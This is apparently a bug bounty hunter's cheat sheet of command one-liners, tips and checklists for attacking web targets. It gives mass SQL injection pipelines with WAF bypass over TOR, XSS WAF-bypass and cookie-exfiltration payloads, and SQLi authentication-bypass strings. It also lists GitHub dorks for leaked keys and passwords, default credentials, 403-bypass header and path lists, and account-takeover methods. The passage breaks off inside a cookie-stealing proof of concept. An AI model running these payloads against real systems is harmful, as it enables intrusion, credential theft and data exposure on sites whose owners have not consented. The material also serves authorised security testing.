
ffuf json to txt output

cat output.json | jq | grep -o '"url": "http[^"]*"' | grep -o 'http[^"]*' | anew out.txt

Search for Sensitive files from Wayback

echo target.com | (gau || hakrawler || waybackurls || katana) | grep -color -E ".xls | \\. xml | \\.xlsx | \\.json | \\. pdf | \\.sql | \\. doc| \\.docx | \\. pptx| \\.txt| \\.zip| \\.tar.gz| \\.tgz| \\.bak| \\.7z| \\.rar"

---

SQLi:

cat subs.txt | (gau || hakrawler || katana || waybckurls) | grep "=" | dedupe | anew tmp-sqli.txt && sqlmap -m tmp-sqli.txt --batch --random-agent --level 5 --risk 3 --dbs &&
for i in $(cat tmp-sqli.txt); do ghauri -u "$i" --level 3 --dbs --current-db --batch --confirm; done

Bypass WAF using TOR

sqlmap -r request.txt --time-sec=10 --tor --tor-type=SOCKS5 --check-tor --dbs --random-agent --tamper=space2comment

find which host is vuln in output folder of sqlmap/ghauri root@bb:~/.local/share/sqlmap/output#

find -type f -name "log" -exec sh -c 'grep -q "Parameter" "{}" && echo "{}: SQLi"' \;

---

CORS:

echo target.com | (gau || hakrawler || waybackurls || katana) | while read url;do target=$(curl -s -I -H "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done

---

Prototype Pollution:

subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"

---

JS Files:

Find JS Files:

cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt

while read -r url; do
  if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \
     curl -s -I "$url" | grep -iq 'Content-Type:.*\(text/javascript\|application/javascript\)'; then
    echo "$url"
  fi
done < urls.txt > js.txt

Hidden Params in JS:

cat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done

Extract sensitive end-point in JS:

cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u

---

SSTI:

for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done

---

Scan IPs

cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0

Screenshots using Nuclei

nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v

SQLmap Tamper Scripts - WAF bypass

sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent

Shodan Cli

shodan search Ssl.cert.subject.CN:"target.com" --fields ip_str | anew ips.txt

Ffuf.json to only ffuf-url.txt

cat ffuf.json | jq | grep "url" | sed 's/"//g' | sed 's/url://g' | sed 's/^ *//' | sed 's/,//g'

Update golang

curl https://raw.githubusercontent.com/udhos/update-golang/master/update-golang.sh | sudo bash

Censys CLI

censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'

Nmap cidr to ips.txt

cat cidr.txt | xargs -I @ sh -c 'nmap -v -sn @ | egrep -v "host down" | grep "Nmap scan report for" | sed 's/Nmap scan report for //g' | anew nmap-ips.txt'

Xray urls scan

for i in $(cat subs.txt); do ./xray_linux_amd64 ws --basic-crawler $i --plugins xss,sqldet,xxe,ssrf,cmd-injection,path-traversal --ho $(date +"%T").html ; done

grep only nuclei info

result=$(sed -n 's/^\([^ ]*\) \([^ ]*\) \([^ ]*\) \([^ ]*\).*/\1 \2 \3 \4/p' file.txt)
echo "$result"

[sqli-error-based:oracle] [http] [critical] https://test.com/en/events/e5?utm_source=test'&utm_medium=FUZZ'

Download js files

## curl
mkdir -p js_files; while IFS= read -r url || [ -n "$url" ]; do filename=$(basename "$url"); echo "Downloading $filename JS..."; curl -sSL "$url" -o "downloaded_js_files/$filename"; done < "$1"; echo "Download complete."

## wget
sed -i 's/\r//' js.txt && for i in $(cat js.txt); do wget "$i"; done

Filter only html/xml content-types for xss

cat urls.txt | httpx -ct -silent -mc 200 -nc | grep -i -E "text/html|text/xml" | cut -d '[' -f 1 | anew xml_html.txt

## using curl
while read -r url; do
  if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \
     curl -s -I "$url" | grep -iq 'Content-Type:.*text/\(html\|xml\)'; then
    echo "$url"
  fi
done < urls.txt > xml_html.txt

Get favicon hash

curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq

Build wordlists from a nuclei templates

for i in `grep -R yaml | awk -F: '{print $1}'`; do cat $i | grep 'BaseURL}}/' | awk -F '{{BaseURL}}' '{print $2}' | sed 's/"//g' | sed "s/'//g"; done

Dorks

Ishanoshada/GDorks: Google Dork List - Uncover the Hidden Gems of the Internet ( There are at least 320+ categories )

How to use Google Dorks

Scope Restriction/Filtering
Command	Description	Example
site:	Restricts search to a specific website.	site:yahoo.com
filetype:	Only returns searches that match the stated file type. Must be searched with a query.[1]	dogs filetype:pdf
@	Restricts search to a particular social media site.	@youtube
Information
Command	Description	Example
define:	Defines the provided word or phrase.	define:arbitrary
stocks:	Returns the financial activity of the provided stock.	stocks:netflix
movie:	Gives info about the provided movie.	movie:aladdin
source:	Finds reports from the provided Google News source.	source:cnn.com
$	Searches for a price of an item in USD.	ipad $500
map:	Returns a map of the provided location.	map:new york city
weather:	Returns the current weather of the provided location.	weather:london
Links
Command	Description	Example
cache:	Returns a link to Google's last cache of the provided website.	cache:yahoo.com
link:	Returns pages that link to the provided domain.	link:cnn.com
related:	Returns websites that are related to the provided website.	related:google.com
Text Commands
Command	Description	Example
intitle:	Returns websites that have the first keyword in the title, and the other keywords somewhere else on the page (including in the title).	intitle: stereo speakers
allintitle:	Returns websites that have all the keywords in the title.	allintitle: stereo speakers
inurl:	Returns websites that have the first keyword in the URL, and the other keywords somewhere else on the page (including in the URL).	inurl: dog behavior
allinurl:	Returns websites that have all the keywords in the URL.	allinurl: dog behavior
Operators
Command	Description	Example
" "	Put around your search query to search the entire thing.	"car dealership"
OR, |	Put between queries to look for one and/or the other.	iPhone OR Google Pixel
( )	Group queries into logical groups.	(dogs OR cats) behavior
-	Place in front of a query to remove it from the search page.	restaurants near me -pizza
*	Wildcard placeholder.	Windows error code *
..	Place between numbers to search the range (inclusive of the numbers in the query).	Warped Tour 2000..2005
AROUND( )	Returns pages that have the provided number of words around the search query.	buy AROUND(2) cars
Math
Command	Description	Example
+	Adds two numbers.	10 + 20
-	Subtract two numbers.	10 - 20
*	Multiplies two numbers.	10 * 20
/	Divides two numbers.	10 / 20
% of	Finds the percentage of a number.	10% of 20
^, **	Raise the first number to the power of the second number.	10^20, 10**20
in, to	Convert a quantity or word to another unit or language.	6 ft to cm, hello in French
sqrt( )	Find the square root of a number.	sqrt(25)
i	Placeholder for an imaginary number. Use with other math functions.	i * 20
choose	Put between two numbers to perform combinatorics.	10 choose 20
sin, cos, tan	Trigonometric functions.	sin 20 degrees
timer	Sets a timer for the provided time.	timer 10 minutes
graph	Graphs the provided equation.	graph log(x)

How to Use Google Dorks

Download Article

1. [

   

   Step 1 Simply add one or more dorks to your search query.

   ](https://www.wikihow.com/Google-Dorking-Commands#/Image:14709789-3.jpg)

   **Simply add one or more dorks to your search query.**Your query and each dork should be separated by a space.

   • For example, if you wanted to search for something on Facebook, you can filter out search results from all other sites by writing [query here] site:facebook.com.

2. [

   

   Step 2 You can search (most) commands without a query.

   ](https://www.wikihow.com/Google-Dorking-Commands#/Image:14709789-4.jpg)

   **You can search (most) commands without a query.**This is especially useful for commands like define:. Some commands, however, like filetype: must be searched with a query.

   • For example, if you wanted to define the word "sanctimonious," you would search define:sanctimonious.

#Github Dorks sensitive info finding queries

1."API_KEY" OR "api_key" or "API_SECRET" OR "api_secret" tesla

2."DB_PASSWORD" OR "DATABASE_URL" OR "DATABASE_PASSWORD" tesla

3."aws_access_key_id" OR "aws_secret_access_key" tesla

4.filename:.env tesla

5."password" OR "secret" OR "credential" tesla

6."-----BEGIN OPENSSH PRIVATE KEY-----" tesla

7."confidential" OR "sensitive" tesla

8."error" OR "exception" tesla

9."password" OR "secret" OR "credential" tesla in:file branch:*

1. tesla extension:json OR extension:yml OR extension:xml OR extension:config

11."-----BEGIN CERTIFICATE-----" tesla

12."-----BEGIN PRIVATE KEY-----" tesla

13."token" OR "access_token" tesla

1. filename:config tesla

2. filename:settings tesla

3. "fatal OR "exception" OR "error" tesla

4. //tesla OR /* tesla

5. "webhook" tesla

6. tesla language:python

7. tesla language:javascript

8. secrets. tesla

Nuclei recon

STEP 1 : Using Dynamic Application Security Testing (DAST) , and Headless

--->

 nuclei -l targets.txt -severity high,critical,medium -t  /home/rohit/.local/nuclei-templates/  -dast -headless

STEP 2 : Targeting Specific Vulnerabilities (XSS, SQLi):

--->

nuclei -l targets.txt -severity high,critical,medium -tags xss,sqli -t /home/rohit/.local/nuclei-templates/  -dast

STEP 3 : P1, P2, P3 Vulnerabilities:

--->

nuclei -l targets.txt -severity high,critical,medium -tags p1,p2,p3 -t  /home/rohit/.local/nuclei-templates/ -dast

STEP 4: Combined Command for Maximum Coverage

--->

 nuclei -l targets.txt -severity high,critical,medium -tags xss,sqli,p1,p2,p3 -t  /home/rohit/.local/nuclei-templates/  -dast -headless

STEP 5: The Ultimate Nuclei Command

--->

nuclei -l targets.txt -t  /home/rohit/.local/nuclei-templates/  -severity high,critical,medium -tags cve,http,vulnerabilities,generic,xss,sqli,lfi,openredirect,cors,p1,p2,p3 -dast -headless -silent -rate-limit 150 -o output.txt

how to use in bug bounty programs:

subfinder -d xyz.com -all  | nuclei -t crlf.yaml -rl 50
subfinder -d xyz.com -all  | nuclei -t openRedirect.yaml -rl 100
subfinder -d xyz.com -all  | nuclei -t iis.yaml
subfinder -d xyz.com -all  | nuclei -t cors.yaml -rl 100
subfinder -d xyz.com -all  | waybackurls | gf sqli | uro | nuclei -t errorsqli.yaml -rl 50

cat or.txt | nuclei -t /home/rohit/recon/payloads/custom_nuclei/openRedirect.yaml --retries 2
cat or.txt | nuclei -t /home/niuclei-templates/blind-ssrf.yaml --retries 2 -dast
cat or.txt | nuclei -t /home/niuclei-templates/response-ssrf.yaml --retries 2 -dast
cat or.txt | nuclei -t /home/niuclei-templates/credential-disclosure-all.yaml 
cat or.txt | nuclei -t /home/niuclei-templates/x-forwarded.yaml 

cat crlf.txt | nuclei -t /home/rohit/recon/payloads/custom_nuclei/cRlf.yaml

cat sql.txt | nuclei -t /home/niuclei-templates/errsqli.yaml  -dast
cat sql.txt | nuclei -t /home/niuclei-templates/timeqli.yaml -dast

cat iis.txt |  nuclei -t /home/niuclei-templates/iis.yaml  --> next --> shortscan url -F

cat  git.txt | nuclei -t /home/niuclei-templates/gitexposed.yaml 

cat  cors.txt | nuclei -t /home/niuclei-templates/cors.yaml 

[ ] Tip 1

Here’s my last finding (P1)
1- register account
2- intercept request
3- here’s the response in image so in “role” parameter we have ROLE_USER
So i don’t know what i can replace it to privilege my account to admin
4- open source code and look in js files
5-So in js files i user ctrl+F to search about “user_role” i found another value that’s called “admin_role”
6- so i use match and replace to replace value’s
7- boom privilege my account to admin account with full control

[ ] Tip 2

اسعد الله ايامكم بكل خير

هذا ثغرة في شركة مايكروسوفت
كانت جدا بسيطة بسبب خطأ في اعداد سيرفر IIS

Exploit:
https//anywebsite.com/c:/Windows/Win.ini

[ ] Tip 3

CloudFront bypass:⚔️

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>

Would be interested to know if this is target specific or other CloudFront websites are vulnerable

[ ] Tip 4

1 : Get all the URL from wayback / Gau 
2 : Filter out the js file using httpx 
3 : Check Mnauly all the js file or you can use nuclei template or used @trufflesec chrome extension

[ ] Tip 5

target.com/wp-config.php  => 404 not found
target.com/wp-config.php.…  ==> 200 ok and downloaded 
wp-config.php.swp ==>>200 ok

after that if its contain encoded using hexadecimal decode it .

[ ] Tip 6

try testing for SQLi Authentication Bypass :⚔️
username:'--'/"--"
password:'--'/"--"

[ ] Tip 7

default credentials: 
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle:"Oracle+PeopleSoft+Sign-in"
Wrote a nuclei template to test all permutations

[ ] Tip 8

nmap -sV -iL host.txt -oN nmap_scan.txt
Wait a few hours
cat nmap_scan.txt | grep open

[ ] Tip 9

https://youtu.be/VsM6ERUx_AA
------------------------------------------
------------------------------------------
Xss payload
https://github.com/Aacle/xss_payload
------------------------------------------
------------------------------------------
Use Nuclei for leaked api.
$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
------------------------------------------
------------------------------------------
#Scan through #TOR
sqlmap -u “http://target_server/” --tor --tor-type=SOCKS5
------------------------------------------
------------------------------------------
Tip: - always check company's/Organization employees GitHub account for leaked ghp_ token,
and check access to each repo of main organization

------------------------------------------
------------------------------------------

bypass alert ==> [alert][0].call(this,1)
------------------------------------------
------------------------------------------

[ ] Tip 10

1_ Go to SHODAN and get the IP
2 _ Go to Dirsearch and do a Fuzzing
3_ Obtaining sensitive data

[ ] Tip 11

Recon Recon Recon!!
Shodan Dorking Always wins.

ssl:"Company Inc" 
Filter results by http title.
Start fuzzing an interesting asset.
Found swagger-ui/ 
Tried swagger ui xss with
https://github.com/seanmarpo/webjars-swagger-xss

[ ] Tip 12

Have you ever heard about wc-db file disclosure?!

> you can check it by: 
https://target[.]com/.svn/wc.db

> then you can use this tool to dump all of the website source code

https://github.com/anantshri/svn-extractor

[ ] Tip 13

1. Shodan Dork -> Some Assets.
2. Fuzzing & got 403 Forbidden on /config dir.
3. Fuzzing on /config/FUZZ and getting some config files.
4. Same pattern and it works on another asset.

[ ] Tip 14

Default Credentials admin:admin
- shodan dork :
- ssl:"target[.]com" 200 http.title:"dashboard"

[ ] Tip 15

A quick thread about JIRA misconfiguration that I tried today.

3. Google dorks to find jira dashboards.

inurl:/ConfigurePortalPages!default.jspa?view=popular

4. Google dork to find jira filters page.

inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public )

[ ] Tip 16

5. Google dork to find the exposed user list.

inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log

[ ] Tip 17

GitHub Recon Tip: look for CSV files that have a high chance of containing confidential information
dork: "org:company extension:csv admin"
leak: "cc number, cvv, email, phone number"

[ ] Tip 18 Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:

cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-bav --only-poc r --silence --skip-mining-dom --ignore-return 302,404,403

[ ] Tip 19

Tip : "GET request for XML not found" changes the request to POST with XXE payload

[ ] Tip 20 Extract Juicy Info From AlienVault

for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt  ;done

[ ] Tip 21 bypass PHPMYADMIN

phpmyadmin =>301
PHPmyadmin =>200
PHPMYadmin =>200
PHPMYADMIN =>200
phpMYadmin =>200
phpmyAdmin =>200

[ ] Tip 22 SVN

1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/
3. clone & use https://github.com/anantshri/svn-extractor
4. ./svn-extractor.py --url http://url.com --match database.php
5. result in output dir and just open it

[ ] Tip 23 xss

in :
firstname:<img src=x
middlename:onerror
lastname:=alert(domain)/>

==========================
1:- Use https://github.com/Leoid/MatchandReplace
2:- Import to burpsuite match and replace.
3:- Run gospider. gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
4:- The Blind xss payload will added automatically by burp and gospider.
Finally:- 4 BLIND XSS REPORTS.

[ ] Tip 24 Cookie Bomb

URL that causes the cookie length to exceed request header limits for all requests until the cookie expires.
1. Find a Cookie set by a parameter
2. Inject as many commas as you can into the parameter until you DoS that user

[ ] Tip 25 xss via jwt

1. Make a jwt token and insert a xss paylaod.
2. The final url is like url/dest?jwt=vulnerable-jwt-token. 
(jwt= paramter was decoding the provided jwt token and show's it into the page).

[ ] Tip 26 Getting Private Information URLs by curling

1. Grab all URLs from your target which you think hard to hunt or test or static
2. Save all files in any.txt 
3. Command : for i in $(cat any.txt); do curl "$i" >> output.txt; done
4. All curled response grep for following
Keywords:
drive. google
docs. google
/spreadsheets/d/
/document/d/
NOTE: This creates lots of junk so make sure you perform in folder , so you can delete later
You will get URLs includes juicy information

[ ] Tip 26 Injecting Payload In Phone Numbers field

https://twitter.com/Pwn2arn/status/1609146484263641089

[ ] Tip 27 Easy P1 upside_down_face

1: Collect all the Js files by using the developer tool on mozila
2: Run Link Finder Tool on that JS files which you got from dev tool or use Js Miner tool 
3: Now check manually sensitive keyword js file

[ ] Tip 28 Tips for my last P1 :

1 - Found dev portal for developing require Basic Auth 
2 - search in GitHub "domain" docker
3- found a user try to pull the privite repository and passing the username:pass 
4 - Decode Base64 Basic Auth 
5 - Logged in and full access on all Prod

[ ] Tip 29 Github leak for Aws,jira,okta etc

1. Org:"target" pwd/pass/passwd/password
2. "target. atlassian" pwd/pass/passwd/password
3. "target. okta" pwd/pass/passwd/password
4. "Jira. target" pwd/pass/passwd/password

[ ] Tip 30 soucremap js

https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap

[ ] Tip 31 if a site uses AngularJS,

test {{7*7}} to see whether 49 is rendered anywhere.
If the application is built with ASP.NET with XSS protection
enabled, you might want to focus on testing other vulnerability
types first and check for XSS as a last resort.

AngularJS Client-Side Template Injection
https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXUEZ5oVPWOiYu4WwGqWhE

[ ] Tip 32 If a site is built with Rails,

you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the
RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pattern
www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might prioritize testing
insecure direct object reference vulnerabilities because this vulnerability type is easy for developers to overlook.

[ ] Tips 1

XSS WAF Bypass using location concatenation: 

Payload:
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">

[ ] Tips 2

[+] Another awesome Adobe AEM Dispatcher filter bypass technique? oh okay

Hunting for JSON GET Servlet on /content.1.json however result = 404?

Try this:

/conten/.1.json 
/conten/t.1.json
/content.tidy.1.json
/conten/.tidy.infinity.json

[ ] Tips 3

Try these file-uploading extensions accordingly.

ASP Applications:

.asa -> potential remote code execution

.asax -> potential remote code execution

.asp -> potential remote code execution

.aspx -> potential remote code execution

Java Applications: 

.jsp -> potential remote code execution

.jspx -> potential remote code execution

Perl Applications: 

.pl -> potential remote code execution

Python Applications: 

.py -> potential remote code execution

Ruby Applications:

.rb -> potential remote code execution

Other files that should be restricted for most applications: 

.bat
.cgi
.exe
.htm -> potential XSS
.html -> potential XSS
.jar
.rar
.shtml
.svg -> potential XSS
.swf -> potential XSS
.tar
.zip
.cer -> potential XSS
.hxt -> potential XSS
.stm -> potential XSS

[ ] Tips 4

For first time i found a SQL Injection On **sitemap.xml** endpoint 😎😎

#bugbountytips #bugbountytip 

target[.]com/sitemap.xml?offset=1;SELECT IF((8303>8302),SLEEP(9),2356)#

sleep payload 
[1;SELECT IF((8303>8302),SLEEP(9),2356)#] = 9s

For who asking about sqlmap command in this case 

sqlmap -u "target/sitemap.xml?offset=1" -p offset --level 5 --risk 3 --dbms=MySQL --hostname --test-filter="MySQL >= 5.0.12 stacked queries"

[ ] Tips 5

target[.]com/phpmyadmin/setup/index.php
==> 301 to login page

target[.]com/phpMyAdmin/setup/index.php
==> 200 to phpmyadmin setup

phpmyadmin 301
phpMyAdmin 200

[ ] Tips 6

1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/
3. clone & use https://github.com/anantshri/svn-extractor
4. ./svn-extractor.py --url http://url.com --match database.php
5. result in output dir and just open it
credit:@faizalabroni

[ ] Tips 7

SQLi via parameter name injection.

Payload:
someparam[id) VALUES (NULL); WAITFOR DELAY '0:0:5';--]=test

---

vulnerability-Checklist

1. AEM misconfiguration

2. Authentication

3. IDOR

4. Business Logic

5. jire vulnerability

6. register vulnerability

7. 2FA bypassing

8. admin panal.md

9. exif vulnerability

10. cookie attack

11. reset password attack

12. Acount takeover checklist

13. 403 bypass checklist

14. tips from twitter

15. tips from twitter p 2

16. Sql injection

17. xss

18. File Upload

19. rate limit

20. json attack

21. Csrf

22. RCE

23. API AUTHORIZATION

24. API Authentication

25. MASS ASSIGNMENT

26. Django checklist

27. Hacking Symfony

#403-bypass

• Tools

https://github.com/iamj0ker/bypass-403
https://github.com/channyein1337/403-bypass/blob/main/403-bypass.py
https://github.com/nico989/B1pass3r
https://github.com/Dheerajmadhukar/4-ZERO-3

[ ] bypass by fuzz or brute force

you can use dirsearch tool or discovery content path 

[ ] bypass by waybachurl

search in wayback about this subdomain you can find any important path 

[ ] bypass by header names

Base-Url
Client-IP
Http-Url
Proxy-Host
Proxy-Url
Real-Ip
Redirect
Referer
Referrer
Refferer
Request-Uri
Uri
Url
X-Client-IP
X-Custom-IP-Authorization
X-Forward-For
X-Forwarded-By
X-Forwarded-For-Original
X-Forwarded-For
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Port
X-Forwarded-Scheme
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded
X-Forwarder-For
X-Host
X-Http-Destinationurl
X-Http-Host-Override
X-Original-Remote-Addr
X-Original-Url
X-Originating-IP
X-Proxy-Url
X-Real-Ip
X-Remote-Addr
X-Remote-IP
X-Rewrite-Url
X-True-IP

[ ] bypass by header payloads

Base-Url: 127.0.0.1
Client-IP: 127.0.0.1
Http-Url: 127.0.0.1
Proxy-Host: 127.0.0.1
Proxy-Url: 127.0.0.1
Real-Ip: 127.0.0.1
Redirect: 127.0.0.1
Referer: 127.0.0.1
Referrer: 127.0.0.1
Refferer: 127.0.0.1
Request-Uri: 127.0.0.1
Uri: 127.0.0.1
Url: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Forwarded-Port: 443
X-Forwarded-Port: 4443
X-Forwarded-Port: 80
X-Forwarded-Port: 8080
X-Forwarded-Port: 8443
X-Forwarded-Scheme: http
X-Forwarded-Scheme: https
X-Forwarded-Server: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Host: 127.0.0.1
X-Http-Destinationurl: 127.0.0.1
X-Http-Host-Override: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Proxy-Url: 127.0.0.1
X-Real-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Rewrite-Url: 127.0.0.1
X-True-IP: 127.0.0.1

[ ] bypass by url payloads

#
#?
%09
%09%3b
%09..
%09;
%20
%23
%23%3f
%252f%252f
%252f/
%2e%2e
%2e%2e/
%2f
%2f%20%23
%2f%23
%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f/
%2f;?
%2f?;
%3b
%3b%09
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3b%2f%2e.
%3b%2f..
%3b/%2e%2e/..%2f%2f
%3b/%2e.
%3b/%2f%2f../
%3b/..
%3b//%2f../
%3f%23
%3f%3f
%3f.php
..
..%00/
..%00/;
..%00;/
..%09
..%0d/
..%0d/;
..%0d;/
..%5c/
..%ff/
..%ff/;
..%ff;/
../
..;%00/
..;%0d/
..;%ff/
..;\
..;\;
..\
..\;
.html
.json
/
/#
/%20
/%20#
/%20%23
/%23
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252e/
/%252f
/%2e%2e
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2e/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2e/
/%2e//
/%2f
/%3b/
/..
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/../
/../../
/../../../
/../../..//
/../..//
/../..//../
/../..;/
/.././../
/../.;/../
/..//
/..//../
/..//../../
/..//..;/
/../;/
/../;/../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/
/..;/../
/..;/..;/
/..;//
/..;//../
/..;//..;/
/..;/;/
/..;/;/..;/
/./
/.//
/.;/
/.;//
//
//..
//../../
//..;
//./
//.;/
///..
///../
///..//
///..;
///..;/
///..;//
//;/
/;/
/;//
/;?
/;x
/;x/
/?
/?;
/x/../
/x/..//
/x/../;/
/x/..;/
/x/..;//
/x/..;/;/
/x//../
/x//..;/
/x/;/../
/x/;/..;/
;
;%09
;%09..
;%09..;
;%09;
;%2F..
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../
;%2f..
;%2f..%2f%2e%2e%2f%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/..%2f
;%2f..%2f/../
;%2f../%2f..%2f
;%2f../%2f../
;%2f..//..%2f
;%2f..//../
;%2f..///
;%2f..///;
;%2f..//;/
;%2f..//;/;
;%2f../;//
;%2f../;/;/
;%2f../;/;/;
;%2f..;///
;%2f..;//;/
;%2f..;/;//
;%2f/%2f../
;%2f//..%2f
;%2f//../
;%2f//..;/
;%2f/;/../
;%2f/;/..;/
;%2f;//../
;%2f;/;/..;/
;/%2e%2e
;/%2e%2e%2f%2f
;/%2e%2e%2f/
;/%2e%2e/
;/%2e.
;/%2f%2f../
;/%2f/..%2f
;/%2f/../
;/.%2e
;/.%2e/%2e%2e/%2f
;/..
;/..%2f
;/..%2f%2f../
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/../
;/../%2f/
;/../../
;/../..//
;/.././../
;/../.;/../
;/..//
;/..//%2e%2e/
;/..//%2f
;/..//../
;/..///
;/../;/
;/../;/../
;/..;
;/.;.
;//%2f../
;//..
;//../../
;///..
;///../
;///..//
;?
;x
;x/
;x;
?
?#
?.php
?;
??
///
/%2f/
//%2f
%2f/%2f
%2f%2f%2f
%2f//

##Acount takeover

[ ] a lot of ideas in this article by omar hashem

https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5

[ ] OAuth to Account takeover

https://book.hacktricks.xyz/pentesting-web/oauth-to-account-takeover

[ ] Pre-Account Takeover

A pre-account takeover occurs when an attacker creates a user account using one signup method and the victim creates another account using a different signup method using the same email address. Because the email addresses are the same, the application connects the two accounts. when the app is unable to validate email addresses.

How to hunt :-
    Try registering any email address without verifying it.
    Try registering an account again, but this time with a different method, such as ‘sign up with Google’ from same email address.
    Due to the fact that both email addresses are the same, the web application will link the two accounts.
    Now try logging in using the specified password and username. Check to see whether you can see information from that account that was retrieved via Google.

[ ] Account takeover due to Improper Rate limit

How to Hunt:-

    capture the request at the login page, while providing username and password.
    send it to intruder and Brute force it.
    Analyze the response and length.

[ ] Account takeover by utilizing sensitive data exposure

Sensitive data exposure occurs when a web application failed to properly protect confidential information, resulting in the disclosure of sensitive information or data about users, or anything related to them, to a third party.

Occasionally, the application displays unnecessary data, such as valid OTPs, hashes, or passwords, over the request and response parts. So it’s a good idea to pay attention to the response and request portions.

[ ] login

1. check if you are able to brute force the password
2. Test for OAuth misconfigurations
3. check if you are able to bruteforce the login OTP
4. check for JWT mesconfigurations
5. Test for SQL injection to bypass authentication ```admin" or 1=1;--```
6. check if the application validates the OTP or Token

[ ] password reset

1. check if you are able to brute force the password reset OTP
2. test for token predectability
3. test for JWT misconfigurations
4. check if the password reset endpoint is vulnerable to IDOR
5. check if the password reset endpoint is vulnerable to Host Header injection
6. check if the password reset endpoint is leaking the token or OTP in the HTTP response
7. check if the application validates the OTP or Token
8. test for HTTP parameter Pollution (HPP)
    

[ ] XSS to Account Takeover

if the application does not use auth token or you can't access the cookies because the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password

1. try to exfiltrate the cookies
2. try to exfiltrate the Auth Token
3. if the cookie's "domain" attribute is set, search for xss in the subdomains and use it to exfiltrate the cookies
    - PoC Example:
        ```html
        
        <script>
            /*
            this script will create a hidden <img> element
            when the browser tries to load the image
